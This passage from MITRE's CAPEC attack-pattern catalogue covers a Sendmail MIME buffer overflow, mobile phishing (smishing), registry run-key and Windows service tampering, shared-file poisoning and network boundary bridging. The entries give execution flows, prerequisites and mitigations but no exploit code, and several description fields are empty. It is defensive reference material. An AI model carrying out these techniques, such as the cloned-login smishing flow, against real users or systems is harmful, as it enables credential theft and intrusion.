Mail server vendor has not released a patch for the MIME conversion routine, the patch itself has a security hole or does not fix the original problem, or the patch has not been applied to the user's system.

Skills Required

[Level: Low]

It may be trivial to cause a DoS via this attack pattern

[Level: High]

Causing arbitrary code to execute on the target system.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Integrity	Modify Data
Availability	Unreliable Execution
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Stay up to date with third party vendor patches

Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.

For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):

Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,

T=DNS/RFC822/X-Unix,
A=mail -d $u

Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,

D=$z:/,
T=X-Unix,
A=sh -c $u

This can be achieved for the "Mlocal" and "Mprog" Mailers by modifying the ".mc" file to include the following lines:

define(`LOCAL_MAILER_FLAGS',

ifdef(`LOCAL_MAILER_FLAGS',

`translit(LOCAL_MAILER_FLAGS, `9')',
`rmn'))

define(`LOCAL_SHELL_FLAGS',

ifdef(`LOCAL_SHELL_FLAGS',

`translit(LOCAL_SHELL_FLAGS, `9')',
`eu'))

and then rebuilding the sendmail.cf file using m4(1).

From "Exploiting Software", please see reference below.

Use the sendmail restricted shell program (smrsh)

Use mail.local

Example Instances

A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges.

Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild.

CAPEC-625: Mobile Device Fault Injection

Attack Pattern ID: 625

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	624	Hardware Fault Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Communications
Mechanisms of Attack	Inject Unexpected Items

Skills Required

[Level: High]

Adversaries require non-trivial technical skills to create and implement fault injection attacks on mobile devices. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required. This prerequisite makes the attack challenging to perform (assuming that physical security countermeasures and monitoring are in place).

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control	Read Data

Mitigations

Strong physical security of all devices that contain secret key information. (even when devices are not in use)

Frequent changes to secret keys and certificates.

Related Weaknesses

CWE-ID	Weakness Name
1247	Improper Protection Against Voltage and Clock Glitches
1248	Semiconductor Defects in Hardware Logic with Security-Sensitive Implications
1256	Improper Restriction of Software Interfaces to Hardware Features
1319	Improper Protection against Electromagnetic Fault Injection (EM-FI)
1332	Improper Handling of Faults that Lead to Instruction Skips
1334	Unauthorized Error Injection Can Degrade Hardware Redundancy
1338	Improper Protections Against Hardware Overheating
1351	Improper Handling of Hardware Behavior in Exceptionally Cold Environments

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-164: Mobile Phishing

Attack Pattern ID: 164

Abstraction: Detailed

View customized information:

Description

Alternate Terms

Term: Smishing

Term: MobPhishing

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the adversary impersonate the legitimate site more convincingly. The adversary can use homograph or similar attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

Techniques
Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
Optionally obtain a legitimate SSL certificate for the new domain name.

Explore legitimate website and create duplicate: An adversary creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

Techniques
Use spidering software to get copy of web pages on legitimate site.
Manually save copies of required web pages from legitimate site.
Create new web pages that have the legitimate site's look and feel, but contain completely new content.

Exploit

Convince user to enter sensitive information on adversary's site.: An adversary sends a text message to the victim that has a call-to-action, in order to persuade the user into clicking the included link (which then takes the victim to the adversary's website) and logging in. The key is to get the victim to believe that the text message originates from a legitimate entity with which the victim does business and that the website pointed to by the URL in the text message is the legitimate website. A call-to-action will usually need to sound legitimate and urgent enough to prompt action from the user.
Techniques
Send the user a message from a spoofed legitimate-looking mobile number that asks the user to click on the included link.
Use stolen credentials to log into legitimate site: Once the adversary captures some sensitive information through phishing (login credentials, credit card information, etc.) the adversary can leverage this information. For instance, the adversary can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.
Techniques
Log in to the legitimate site using another user's supplied credentials

Prerequisites

An adversary needs mobile phone numbers to initiate contact with the victim.

An adversary needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their "hooks" to many potential victims.

An adversary needs to have a sufficiently compelling call to action to prompt the user to take action.

The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity.

Skills Required

[Level: Medium]

Basic knowledge about websites: obtaining them, designing and implementing them, etc.

Resources Required

Either mobile phone or access to a web resource that allows text messages to be sent to mobile phones. Resources needed for regular Phishing attack.

Indicators

You receive a text message from an entity that you are not even a customer of prompting you to log into your account.

You receive any text message that provides you with a link that takes you to a website which requires you to enter your credentials.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Do not follow any links that you receive within text messages and do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. Safe practices also include leveraging the entity's mobile application or directly typing the entity's URL in the browser and only then logging in. Never reply to any text messages that ask you to provide sensitive information of any kind.

Example Instances

The target receives a text message stating that their Apple ID has been disabled due to suspicious activity and that they need to click on the link included in the message to log into their Apple account in order to enable it. The link in the text message looks legitimate and once the link is clicked, the login page is an exact replica of Apple's standard login page. The target supplies their login credentials and are then notified that their account has now been unlocked. However, the adversary has just collected the target's Apple account information, which can now be used by the adversary for a variety of purposes.

Related Weaknesses

CWE-ID	Weakness Name
451	User Interface (UI) Misrepresentation of Critical Information

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-590] "What is smishing?". NortonLifeLock Inc.. 2018-01-18. <https://us.norton.com/internetsecurity-emerging-threats-what-is-smishing.html>. URL validated: 2020-11-13.

[REF-591] "What is Smishing and How to Defend Against it?". AO Kaspersky Lab. <https://usa.kaspersky.com/resource-center/threats/what-is-smishing-and-how-to-defend-against-it>. URL validated: 2020-11-13.

[REF-592] Jovi Umawing. "Something else is phishy: How to detect phishing attempts on mobile phones". Malwarebytes. 2018-12-10. <https://blog.malwarebytes.com/101/2018/12/something-else-phishy-detect-phishing-attempts-mobile/>. URL validated: 2020-11-13.

[REF-593] Aaron Cockerill. "5 most common mobile phishing tactics". AT&T Cybersecurity. 2020-04-17. <https://cybersecurity.att.com/blogs/security-essentials/mobile-phishing>. URL validated: 2020-11-13.

[REF-696] Ben Martens. "11 Facts + Stats on Smishing (SMS Phishing) in 2021". SafetyDetectives. 2021. <https://www.safetydetectives.com/blog/what-is-smishing-sms-phishing-facts/>. URL validated: 2021-11-23.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Alternate_Terms
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Status, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Skills_Required
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated References
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Mobile Phishing (aka MobPhishing)

CAPEC-438: Modification During Manufacture

Attack Pattern ID: 438

Abstraction: Meta

View customized information:

Description

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	447	Design Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources

Related Weaknesses

No mapping at this level, since it would encompass a plethora of CWEs. Look at related mappings of this CAPEC's descendants.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195	Supply Chain Compromise

References

[REF-380] Marcus Sachs. "Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization". Verizon, Inc..

[REF-381] Thea Reilkoff. "Hardware Trojans: A Novel Attack Meets a New Defense". Yale School of Engineering and Applied Science. 2010.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Integrity Modification During Manufacture

CAPEC-270: Modification of Registry Run Keys

Attack Pattern ID: 270

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	203	Manipulate Registry Information
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	555	Remote Services with Stolen Credentials
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	529	Malware-Directed Internal Reconnaissance
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	568	Capture Credentials via Keylogger
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	646	Peripheral Footprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Determine target system: The adversary must first determine the system they wish to target. This attack only works on Windows.

Experiment

Gain access to the system: The adversary needs to gain access to the system in some way so that they can modify the Windows registry.
Techniques
Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked.
Gain remote access to a system through a variety of means.

Exploit

Modify Windows registry: The adversary will modify the Windows registry by adding a new entry to the "run keys" referencing a desired program. This program will be run whenever the user logs in.

Prerequisites

The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data Gain Privileges

Mitigations

Identify programs that may be used to acquire process information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.

Example Instances

An adversary can place a malicious executable (RAT) on the target system and then configure it to automatically run when the user logs in to maintain persistence on the target system.

Through the modification of registry "run keys" the adversary can masquerade a malicious executable as a legitimate program.

Related Weaknesses

CWE-ID	Weakness Name
15	External Control of System or Configuration Setting

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1547.001	Boot or Logon Autostart Execution: Registry Run Keys / Start Folder
1547.014	Boot or Logon Autostart Execution: Active

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Mitigations, Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow, Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-478: Modification of Windows Service Configuration

Attack Pattern ID: 478

Abstraction: Detailed

View customized information:

Description

An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	203	Manipulate Registry Information

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Determine target system: The adversary must first determine the system they wish to modify the registry of. This needs to be a windows machine as this attack only works on the windows registry.

Experiment

Gain access to the system: The adversary needs to gain access to the system in some way so that they can modify the windows registry.
Techniques
Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked.
Gain remote access to a system through a variety of means.

Exploit

Modify windows registry: The adversary will modify the windows registry by changing the configuration settings for a service. Specifically, the adversary will change the path settings to define a path to a malicious binary to be executed.

Prerequisites

The adversary must have the capability to write to the Windows Registry on the targeted system.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Integrity	Execute Unauthorized Commands

Mitigations

Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1574.011	Hijack Execution Flow:Service Registry Permissions Weakness
1543.003	Create or Modify System Process:Windows Service

Content History

Submissions
Submission Date	Submitter	Organization
2018-04-25 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2018-04-25 (Version 2.11)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow

CAPEC-551: Modify Existing Service

Attack Pattern ID: 551

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Mitigations

Limit privileges of user accounts so service changes can only be performed by authorized administrators. Also monitor any service changes that may occur inadvertently.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control
522	Insufficiently Protected Credentials

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1543	Create or Modify System Process

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-562: Modify Shared File

Attack Pattern ID: 562

Abstraction: Detailed

View customized information:

Description

An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	17	Using Malicious Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Mitigations

Disallow shared content. Protect shared folders by minimizing users that have write access. Use utilities that mitigate exploitation like the Microsoft Enhanced Mitigation Experience Toolkit (EMET) to prevent exploits from being run.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1080	Taint shared content

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses

CAPEC-387: Navigation Remapping To Propagate Malicious Content

Attack Pattern ID: 387

Abstraction: Detailed

View customized information:

Description

An adversary manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic.

Extended Description

Performing this attack allows the adversary to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the adversarys' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the adversarys' intent. When the goal is to spread malware, deceptive content is created such as modified links, buttons, or images, that entice users to click on those items, all of which point to a malicious URI. The techniques require use of specialized software that allow the adversary to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system in order to change the destination of various application interface elements.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	386	Application API Navigation Remapping

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Prerequisites

Targeted software is utilizing application framework APIs

Resources Required

A software program that allows the use of adversary-in-the-middle communications between the client and server, such as a man-in-the-middle proxy.

Related Weaknesses

CWE-ID	Weakness Name
471	Modification of Assumed-Immutable Data (MAID)
345	Insufficient Verification of Data Authenticity
346	Origin Validation Error
602	Client-Side Enforcement of Server-Side Security
311	Missing Encryption of Sensitive Data

References

[REF-327] Tom Stracener and Sean Barnum. "So Many Ways [...]: Exploiting Facebook and YoVille". Defcon 18. 2010.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description, Resources_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Extended_Description

CAPEC-700: Network Boundary Bridging

Attack Pattern ID: 700

Abstraction: Standard

View customized information:

Description

Extended Description

Network boundary devices are network devices such as routers and firewalls which segment networks by restricting certain types of traffic from flowing through the device. Network boundary devices are often directly accessible through a portal page for management purposes. An adversary’s goal when conducting network boundary bridging is to connect networks which are being segmented by the device. To do so, the adversary must first compromise the network boundary device.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	161	Infrastructure Manipulation
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	70	Try Common or Default Usernames and Passwords
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Communications
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Identify potential targets: An adversary identifies network boundary devices that can be compromised.

Techniques
The adversary traces network traffic to identify which devices the traffic flows through. Additionally, the adversary can identify devices using fingerprinting methods or locating the management page to determine identifying information about the device.

Experiment

Compromise targets: The adversary must compromise the identified targets in the previous step.

Techniques
Once the device is identified, the adversary can attempt to input known default credentials for the device to gain access to the management console.
Adversaries with sufficient identifying knowledge about the target device can exploit known vulnerabilities in network devices to obtain administrative access.

Exploit

Bridge Networks: The adversary changes the configuration of the compromised network device to connect the networks the device was segmenting. Depending on the type of network boundary device and its capabilities, bridging can be implemented using various methods.

Techniques
The adversary can abuse Network Address Translation (NAT) in firewalls and routers to manipulate traffic flow to their own design. With control of the network device, the adversary can manipulate NAT by either using existing configurations or creating their own to allow two previously unconnected networks to communicate.
Some network devices can be configured to become a proxy server. Adversaries can set up or exploit an existing proxy server on compromised network devices to create a bridge between separate networks.

Prerequisites

The adversary must have control of a network boundary device.

Skills Required

[Level: Medium]

The adversary must understand how to manage the target network device to create or edit policies which will bridge networks.

Resources Required

The adversary requires either high privileges or full control of a boundary device on a target network.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control	Read Data Bypass Protection Mechanism
Integrity Authorization	Alter Execution Logic Hide Activities

Mitigations

Design: Ensure network devices are storing credentials in encrypted stores

Design: Follow the principle of least privilege and restrict administrative duties to as few accounts as possible. Ensure these privileged accounts are secured with strong credentials which do not overlap with other network devices.

Configuration: When possible, configure network boundary devices to use MFA.

Configuration: Change the default configuration for network devices to harden their security profiles. Default configurations are often enabled with insecure features to allow ease of installation and management. However, these configurations can be easily discovered and exploited by adversaries.

Implementation: Perform integrity checks on audit logs for network device management and review them to identify abnormalities in configurations.

Implementation: Prevent network boundary devices from being physically accessed by unauthorized personnel to prevent tampering.

Example Instances

In November 2016, a Smart Install Exploitation Tool was released online which takes advantage of Cisco’s unauthenticated SMI management protocol to download a target’s current configuration files. Adversaries can use this tool to overwrite files to modify the device configurations, or upload maliciously modified OS or firmware to enable persistence. Once the adversary has access to the device’s configurations, they could modify it to redirect network traffic through other network infrastructure.

Related Weaknesses

Some type of access control weakness (CWE-284 or its descendants) is related to this CAPEC, probably as a prerequisite.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1599	Network Boundary Bridging

References

[REF-746] CISA. "Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices". 2018-04-16. <https://www.cisa.gov/uscert/ncas/alerts/TA18-106A>. URL validated: 2023-01-13.

Content History

Submissions
Submission Date	Submitter	Organization
2023-01-24 (Version 3.9)	CAPEC Content Team
2023-01-24 (Version 3.9)

CAPEC-309: Network Topology Mapping

Attack Pattern ID: 309

Abstraction: Standard

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	290	Enumerate Mail Exchange (MX) Records
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	291	DNS Zone Transfers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	293	Traceroute Route Enumeration
